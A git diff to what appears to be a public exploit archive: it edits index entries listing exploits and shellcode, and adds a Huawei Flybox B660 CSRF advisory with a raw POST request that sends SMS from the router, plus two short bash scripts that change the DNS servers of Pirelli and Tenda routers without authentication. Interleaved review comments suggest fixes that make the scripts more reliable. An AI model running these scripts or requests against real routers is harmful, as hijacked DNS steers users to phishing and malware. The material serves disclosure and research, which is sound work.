diff --git a/files.csv b/files.csv
index 0a4c1827b..c66a3ed06 100644
--- a/files.csv
+++ b/files.csv
@@ -909,7 +909,7 @@ id,file,description,date,author,platform,type,port
7742,platforms/windows/dos/7742.txt,"Winamp 5.541 - '.mp3'/'.aiff' Multiple Denial of Services",2009-01-12,securfrog,windows,dos,0
7750,platforms/windows/dos/7750.html,"PowerPoint Viewer OCX 3.1 - Remote File Overwrite",2009-01-13,Stack,windows,dos,0
7751,platforms/windows/dos/7751.pl,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow (PoC)",2009-01-13,Stack,windows,dos,0
-7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 - (CWD) Remote Memory Consumption Exploit",2009-01-13,His0k4,windows,dos,0
+7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 - 'CWD' Command Remote Memory Consumption",2009-01-13,His0k4,windows,dos,0
7776,platforms/hardware/dos/7776.c,"Cisco - VLAN Trunking Protocol Denial of Service",2009-01-14,showrun,hardware,dos,0
7785,platforms/multiple/dos/7785.py,"Oracle TimesTen - Remote Format String (PoC)",2009-01-14,"Joxean Koret",multiple,dos,0
7790,platforms/windows/dos/7790.txt,"netsurf Web browser 1.2 - Multiple Vulnerabilities",2009-01-14,"Jeremy Brown",windows,dos,0
@@ -5340,7 +5340,7 @@ id,file,description,date,author,platform,type,port
41018,platforms/windows/dos/41018.txt,"Boxoft Wav 1.0 - Buffer Overflow",2017-01-11,Vulnerability-Lab,windows,dos,0
41025,platforms/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos,0
41030,platforms/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",windows,dos,0
-41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use After Free",2017-01-13,"Marcin Ressel",windows,dos,0
+41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use-After-Free",2017-01-13,"Marcin Ressel",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -6284,7 +6284,7 @@ id,file,description,date,author,platform,type,port
10313,platforms/linux/local/10313.c,"Libmodplug - 's3m' Remote Buffer Overflow",2008-02-25,dummy,linux,local,0
10319,platforms/windows/local/10319.py,"PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow",2009-12-05,Dr_IDE,windows,local,0
10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 - '.m3u' Buffer Overflow",2009-12-05,Encrypt3d.M!nd,windows,local,0
-10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1)",2009-12-05,Encrypt3d.M!nd,windows,local,0
+10321,platforms/windows/local/10321.py,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1)",2009-12-05,Encrypt3d.M!nd,windows,local,0
10322,platforms/windows/local/10322.py,"Audacity 1.2.6 - '.gro' Buffer Overflow",2009-12-05,Encrypt3d.M!nd,windows,local,0
10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - (hhp) Buffer Overflow (Universal)",2009-12-05,Dz_attacker,windows,local,0
10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow",2009-02-03,"Wolfgang Hamann",multiple,local,0
@@ -6713,7 +6713,7 @@ id,file,description,date,author,platform,type,port
16627,platforms/windows/local/16627.rb,"UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16629,platforms/windows/local/16629.rb,"VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,windows,local,0
-16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0
+16631,platforms/windows/local/16631.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0
16632,platforms/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16634,platforms/windows/local/16634.rb,"Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
@@ -6725,7 +6725,7 @@ id,file,description,date,author,platform,type,port
16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN - '.DWB' Stack Buffer Overflow (Metasploit)",2010-04-05,Metasploit,windows,local,0
16645,platforms/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
-16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
+16648,platforms/windows/local/16648.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16651,platforms/windows/local/16651.rb,"AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16652,platforms/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
@@ -6758,7 +6758,7 @@ id,file,description,date,author,platform,type,port
16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16682,platforms/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript)(Metasploit)",2010-12-16,Metasploit,windows,local,0
-16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local,0
+16683,platforms/windows/local/16683.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local,0
16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
16686,platforms/windows/local/16686.rb,"Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)",2011-03-04,Metasploit,windows,local,0
16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
@@ -8755,6 +8755,7 @@ id,file,description,date,author,platform,type,port
41020,platforms/windows/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,windows,local,0
41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
+41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -9848,7 +9849,7 @@ id,file,description,date,author,platform,type,port
7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext 1.2.0-RC1 - mIRC script",2009-01-08,Phil,windows,remote,0
7712,platforms/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0
7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0
-7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX (Save) Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
+7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 ActiveX - (Save) Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
7748,platforms/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 - 'Save' Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0
7749,platforms/windows/remote/7749.html,"Office Viewer ActiveX Control 3.0.1 - Remote Command Execution",2009-01-13,Houssamix,windows,remote,0
7755,platforms/windows/remote/7755.html,"PowerPoint Viewer OCX 3.1 - Remote Command Execution",2009-01-13,Cyber-Zone,windows,remote,0
@@ -15219,6 +15220,8 @@ id,file,description,date,author,platform,type,port
41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0
41013,platforms/linux/remote/41013.txt,"Ansible 2.1.4 / 2.2.1 - Command Execution",2017-01-09,Computest,linux,remote,0
41041,platforms/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd",2017-01-13,Metasploit,linux,remote,0
+41073,platforms/windows/remote/41073.py,"WinaXe Plus 8.7 - Buffer Overflow",2017-01-16,"Peter Baris",windows,remote,0
+41079,platforms/windows/remote/41079.rb,"DiskBoss Enterprise - GET Buffer Overflow (Metasploit)",2017-01-16,Metasploit,windows,remote,80
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -15824,6 +15827,7 @@ id,file,description,date,author,platform,type,port
40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0
40924,platforms/lin_x86/shellcode/40924.c,"Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",lin_x86,shellcode,0
40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Password Protected Bind Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
+41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -20467,18 +20471,18 @@ id,file,description,date,author,platform,type,port
7730,platforms/php/webapps/7730.txt,"Social Engine - SQL Injection",2009-01-11,snakespc,php,webapps,0
7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0
7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion",2009-01-11,"Danny Moules",php,webapps,0
-7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Local File Inclusion",2009-01-11,Osirys,php,webapps,0
-7734,platforms/php/webapps/7734.txt,"Joomla! Component Portfol - (vcatid) SQL Injection",2009-01-12,H!tm@N,php,webapps,0
+7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Parameter Local File Inclusion",2009-01-11,Osirys,php,webapps,0
+7734,platforms/php/webapps/7734.txt,"Joomla! Component Portfol 1.2 - 'vcatid' Parameter SQL Injection",2009-01-12,H!tm@N,php,webapps,0
7735,platforms/php/webapps/7735.pl,"Simple Machines Forum (SMF) 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,php,webapps,0
7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0
7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps,0
7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Arbitrary File Upload",2009-01-12,ahmadbady,php,webapps,0
-7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0
+7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) - Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0
7743,platforms/php/webapps/7743.txt,"Realtor 747 - 'define.php INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0
7744,platforms/asp/webapps/7744.txt,"Virtual Guestbook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,asp,webapps,0
-7746,platforms/php/webapps/7746.txt,"Joomla! Component com_gigcal (gigcal_gigs_id) 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0
+7746,platforms/php/webapps/7746.txt,"Joomla! Component GigCalendar 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0
7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0
-7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - (cilla.cgi) Remote Command Execution",2009-01-13,ZeN,cgi,webapps,0
+7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - 'cilla.cgi' Remote Command Execution",2009-01-13,ZeN,cgi,webapps,0
7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,asp,webapps,0
7758,platforms/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - Authentication Bypass",2009-01-13,darkjoker,php,webapps,0
7759,platforms/php/webapps/7759.txt,"Syzygy CMS 0.3 - Authentication Bypass",2009-01-14,darkjoker,php,webapps,0
@@ -20500,7 +20504,7 @@ id,file,description,date,author,platform,type,port
7782,platforms/asp/webapps/7782.txt,"DMXReady PayPal Store Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0
7783,platforms/asp/webapps/7783.txt,"DMXReady Photo Gallery Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0
7784,platforms/asp/webapps/7784.txt,"DMXReady Registration Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0
-7786,platforms/php/webapps/7786.txt,"PHP Photo Album 0.8b - (index.php preview) Local File Inclusion",2009-01-14,Osirys,php,webapps,0
+7786,platforms/php/webapps/7786.txt,"PHP Photo Album 0.8b - 'preview' Parameter Local File Inclusion",2009-01-14,Osirys,php,webapps,0
7787,platforms/php/webapps/7787.txt,"DMXReady Secure Document Library 1.1 - SQL Injection",2009-01-14,ajann,php,webapps,0
7788,platforms/asp/webapps/7788.txt,"DMXReady BillboardManager 1.1 - Contents Change",2009-01-14,x0r,asp,webapps,0
7789,platforms/asp/webapps/7789.txt,"DMXReady SDK 1.1 - Arbitrary File Download",2009-01-14,ajann,asp,webapps,0
@@ -37008,3 +37012,10 @@ id,file,description,date,author,platform,type,port
41068,platforms/php/webapps/41068.txt,"MC Inventory Manager Script - Multiple Vulnerabilities",2017-01-15,"Ihsan Sencan",php,webapps,0
41070,platforms/php/webapps/41070.txt,"MC Coming Soon Script - Arbitrary File Upload / Improper Access Restrictions",2017-01-15,"Ihsan Sencan",php,webapps,0
41071,platforms/php/webapps/41071.txt,"MC Documentation Creator Script - SQL Injection",2017-01-15,"Ihsan Sencan",php,webapps,0
+41074,platforms/hardware/webapps/41074.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-12,Vulnerability-Lab,hardware,webapps,0
+41075,platforms/php/webapps/41075.txt,"Business Networking Script 8.11 - SQL Injection / Cross-Site Scripting",2017-01-16,"Ahmet Gurel",php,webapps,0
+41077,platforms/hardware/webapps/41077.sh,"Pirelli DRG A115 ADSL Router - Unauthenticated DNS Change",2017-01-16,"Todor Donev",hardware,webapps,0
+41078,platforms/hardware/webapps/41078.sh,"Tenda ADSL2/2+ Modem D840R - Unauthenticated DNS Change",2017-01-16,"Todor Donev",hardware,webapps,0
+41080,platforms/php/webapps/41080.txt,"Image Sharing Script 4.13 - Multiple Vulnerabilities",2017-01-16,"Hasan Emre Ozer",php,webapps,0
+41081,platforms/php/webapps/41081.txt,"Million Pixels 3 - Authentication Bypass",2017-01-16,"Ihsan Sencan",php,webapps,0
+41082,platforms/java/webapps/41082.txt,"ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities",2017-01-08,"Mehmet Ince",java,webapps,0
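Review bot: The vendor name in the new 41082 entry is misspelled — `ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities` should read `ManageEngine ADManager Plus 6.5.40 - Multiple Vulnerabilities`, and the description column is what searches of this index match on. The same misspelling appears in the added advisory platforms/java/webapps/41082.txt, in its Title line (`ManagEnegine ADManager Plus <= 6.5.40 ...`) and its Application line (`Application: ManagEnegine Admanager`); correcting the index alone would leave the two out of step, so fix both in the same commit.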
diff --git a/platforms/hardware/webapps/41074.txt b/platforms/hardware/webapps/41074.txt
new file mode 100755
index 000000000..b9e00fb5f
--- /dev/null
+++ b/platforms/hardware/webapps/41074.txt
@@ -0,0 +1,206 @@
+Document Title:
+===============
+Huawei Flybox B660 - (POST SMS) CSRF Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2026
+
+
+Release Date:
+=============
+2017-01-12
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2026
+
+
+Common Vulnerability Scoring System:
+====================================
+4.4
+
+
+Product & Service Introduction:
+===============================
+The Huawei B660 has a web interface for configuration. You can use any web browser you like to login to the Huawei B660.
+
+(Copy of the Homepage: http://setuprouter.com/router/huawei/b660/manual-1184.pdf )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a security flaw that affects the official Huawei Flybox B660 3G/4G router product series.
+
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2017-01-12: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Huawei
+Product: Flybox - Router (Web-Application) B660 3G/4G
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+A remote cross-site request forgery vulnerability has been discovered in the official Huawei Flybox B660 3G/4G router product series.
+The security vulnerability allows a remote attacker to perform unauthenticated application requests with non-expired browser session
+credentials to unauthorized execute specific backend functions.
+
+The vulnerability is located in the `/htmlcode/html/sms.cgi` and `/htmlcode/html/sms_new.asp` modules and the `RequestFile` parameter
+of the localhost path URL. Remote attackers are able to send sms messages as malicious bomb to other phone numbers from any Huawei
+Flybox B660 via unauthenticated POST method request.
+
+The security risk of the csrf web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.4.
+Exploitation of the csrf web vulnerability requires a low privilege web-application user account and medium or high user interaction.
+Successful exploitation of the vulnerability results in unauthenticated application requests and manipulation of affected or connected
+device backend modules.
+
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] /htmlcode/html/sms.cgi
+[+] /htmlcode/html/sms_new.asp
+
+Vulnerable Parameter(s):
+[+] RequestFile
+
+
+Software version of the modem:
+1066.12.15.01.200
+
+Hardware version of the modem:
+WLB3TCLU
+
+Name of the device:
+B660
+
+Hardware version of the router:
+WL1B660I001
+
+Software version of the router:
+1066.11.15.02.110sp01
+
+
+Proof of Concept (PoC):
+=======================
+The security vulnerability can be exploited by remote attackers without privilege web-application user account and with medium or high user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+PoC: CSRF Exploit
+
+
+
+
+
+
+
+
+
+--- PoC Session Logs [POST] ---
+/htmlcode/html/sms.cgi?RequestFile=/htmlcode/html/sms_new.asp HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/htmlcode/html/sms.cgi?RequestFile=/htmlcode/html/sms.asp
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 2059
+action=Send&action=Send&sms_text_mode=1&sms_content_1=Malicious Site + IP Adress/Redirection + File:=download&sms_num=1&station=
+,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,&phone_numbers=[Victim PhoneNumber]&page=sms_new.asp
+HTTP/1.1 200 OK
+CACHE-CONTROL: no-cache
+Content-Type: text/html
+Content-Length: 364
+
+
+
+
+replace
+
+
+
+
+
+
+Note: Attackers can as well put an auto-submit java-script generated form inside an high traffic website tp exploit.
+
+
+Security Risk:
+==============
+The security risk of the cross site request forgery vulnerability in the Huawei Flybox B660 3G/4G router product series is estimated as medium. (CVSS 4.4)
+
+
+
+Credits & Authors:
+==================
+SaifAllah benMassaoud - ( http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud )
+
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
+
+Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
+of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
+
+ Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+
+
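Review bot: The precondition for exploitation is stated inconsistently within the advisory: the Technical Details section says exploitation `requires a low privilege web-application user account`, the Proof of Concept section says it works `without privilege web-application user account`, and the description earlier speaks of `non-expired browser session credentials`. For a CSRF the last reading is presumably the intended one — the attacker needs no account of their own, the victim needs a live authenticated session plus the user interaction the text already mentions — but the advisory should say so once and consistently, since the CVSS 4.4 figure and the "Medium" rating depend on that precondition. The Vulnerability Disclosure Timeline lists only the public-disclosure date, with no vendor-notification or vendor-response entry, so a reader cannot tell whether a firmware fix exists; add those dates or state explicitly that the vendor was not contacted. Minor wording in the closing Note: `tp exploit` → `to exploit`.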
diff --git a/platforms/hardware/webapps/41077.sh b/platforms/hardware/webapps/41077.sh
new file mode 100755
index 000000000..9aab83b71
--- /dev/null
+++ b/platforms/hardware/webapps/41077.sh
@@ -0,0 +1,83 @@
+#!/bin/bash
+#
+# Pirelli DRG A115 ADSL Router
+# Unauthenticated Remote DNS Change Exploit
+#
+# Copyright 2017 (c) Todor Donev
+# https://www.ethical-hacker.org/
+# https://www.facebook.com/ethicalhackerorg
+#
+# Description:
+# The vulnerability exist in the web interface, which is
+# accessible without authentication.
+#
+# Once modified, systems use foreign DNS servers, which are
+# usually set up by cybercriminals. Users with vulnerable
+# systems or devices who try to access certain sites are
+# instead redirected to possibly malicious sites.
+#
+# Modifying systems' DNS settings allows cybercriminals to
+# perform malicious activities like:
+#
+# o Steering unknowing users to bad sites:
+# These sites can be phishing pages that
+# spoof well-known sites in order to
+# trick users into handing out sensitive
+# information.
+#
+# o Replacing ads on legitimate sites:
+# Visiting certain sites can serve users
+# with infected systems a different set
+# of ads from those whose systems are
+# not infected.
+#
+# o Controlling and redirecting network traffic:
+# Users of infected systems may not be granted
+# access to download important OS and software
+# updates from vendors like Microsoft and from
+# their respective security vendors.
+#
+# o Pushing additional malware:
+# Infected systems are more prone to other
+# malware infections (e.g., FAKEAV infection).
+#
+# Disclaimer:
+# This or previous programs is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+# The malicious code doesn't sleeping, he stalking..
+#
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+ echo " Pirelli DRG A115 "
+ echo " Unauthenticated Remote DNS Change Exploit"
+ echo " ==================================================================="
+ echo " Usage: $0 "
+ echo " Example: $0 133.7.133.7 8.8.8.8"
+ echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+ echo ""
+ echo " Copyright 2017 (c) Todor Donev "
+ echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
+ exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+ echo " Error : libwww-perl not found =/"
+ exit;
+fi
+ GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+
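Review bot: Both error paths exit with status 0 — the usage banner and the `libwww-perl not found` branch each end in a bare `exit;` — so a caller or wrapper cannot distinguish a failed run from a successful one; use `exit 1` in both places. The value assigned to `GET` from `which GET 2>/dev/null` is never used, because the final line invokes the bare `GET`; either call `"$GET"` or replace the assignment with `command -v GET >/dev/null 2>&1 || { echo " Error : libwww-perl not found =/"; exit 1; }`. On that final line `0&>` is not a valid fd-prefixed redirection (`&>` takes no fd number), so the `0` is passed to GET as an extra positional argument and should be dropped. The header comment names the product but not the firmware or web-interface version(s) tested, which is what a defender needs to decide whether a given unit is affected; add it. platforms/hardware/webapps/41078.sh is the same script apart from the product name and has all four points.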
diff --git a/platforms/hardware/webapps/41078.sh b/platforms/hardware/webapps/41078.sh
new file mode 100755
index 000000000..a4557c40e
--- /dev/null
+++ b/platforms/hardware/webapps/41078.sh
@@ -0,0 +1,83 @@
+#!/bin/bash
+#
+# Tenda ADSL2/2+ Modem D840R
+# Unauthenticated Remote DNS Change Exploit
+#
+# Copyright 2017 (c) Todor Donev
+# https://www.ethical-hacker.org/
+# https://www.facebook.com/ethicalhackerorg
+#
+# Description:
+# The vulnerability exist in the web interface, which is
+# accessible without authentication.
+#
+# Once modified, systems use foreign DNS servers, which are
+# usually set up by cybercriminals. Users with vulnerable
+# systems or devices who try to access certain sites are
+# instead redirected to possibly malicious sites.
+#
+# Modifying systems' DNS settings allows cybercriminals to
+# perform malicious activities like:
+#
+# o Steering unknowing users to bad sites:
+# These sites can be phishing pages that
+# spoof well-known sites in order to
+# trick users into handing out sensitive
+# information.
+#
+# o Replacing ads on legitimate sites:
+# Visiting certain sites can serve users
+# with infected systems a different set
+# of ads from those whose systems are
+# not infected.
+#
+# o Controlling and redirecting network traffic:
+# Users of infected systems may not be granted
+# access to download important OS and software
+# updates from vendors like Microsoft and from
